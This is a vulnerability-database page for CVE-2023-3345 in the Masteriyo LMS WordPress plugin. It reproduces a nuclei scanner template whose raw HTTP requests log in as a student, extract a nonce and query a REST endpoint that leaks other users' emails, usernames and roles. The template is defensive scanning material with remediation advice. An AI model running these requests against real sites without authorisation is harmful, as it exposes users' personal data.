Lucene search
K

LMS by Masteriyo < 1.6.8 - Information Exposure

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

LMS by Masteriyo < 1.6.8 - Information Exposure, Unauthorized Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-3345
31 Jul 202322:14
circl
CNNVD
WordPress plugin LMS by Masteriyo 信息泄露漏洞
31 Jul 202300:00
cnnvd
CVE
CVE-2023-3345
31 Jul 202309:37
cve
Cvelist
CVE-2023-3345 LMS by Masteriyo < 1.6.8 - Information Exposure
31 Jul 202309:37
cvelist
NVD
CVE-2023-3345
31 Jul 202310:15
nvd
Prion
Information disclosure
31 Jul 202310:15
prion
Positive Technologies
PT-2023-24346 · Masteriyo · The Lms By Masteriyo
31 Jul 202300:00
ptsecurity
RedhatCVE
CVE-2023-3345
23 May 202505:31
redhatcve
Vulnrichment
CVE-2023-3345 LMS by Masteriyo < 1.6.8 - Information Exposure
31 Jul 202309:37
vulnrichment
Wordfence Blog
Wordfence Intelligence Weekly WordPress Vulnerability Report (July 3, 2023 to July 9, 2023)
13 Jul 202316:59
wordfence
Rows per page
id: CVE-2023-3345

info:
  name: LMS by Masteriyo < 1.6.8 - Information Exposure
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
  impact: |
    An attacker can gain unauthorized access to sensitive information.
  remediation: |
    Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a
    - https://github.com/RandomRobbieBF/learning-management-system
    - https://wordpress.org/plugins/learning-management-system
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3345
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3345
    cwe-id: CWE-200
    epss-score: 0.64843
    epss-percentile: 0.98484
    cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masteriyo
    product: masteriyo
    framework: wordpress
  tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/masteriyo/v1/users/ HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"username":'
          - '"email":'
          - '"roles":'
        condition: and

      - type: word
        part: header_3
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","versionString'
        internal: true
# digest: 4b0a004830460221009c69b91ee5f89cdfa2dd1ccb820c27219e61986b9d0b32104c97468ed95c02c7022100aecb8c446f8050ec42f2987a5244751e3d2cb8e7aa2a10ed3b0c9c73c0070859:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.16.5
EPSS0.64843
SSVC
27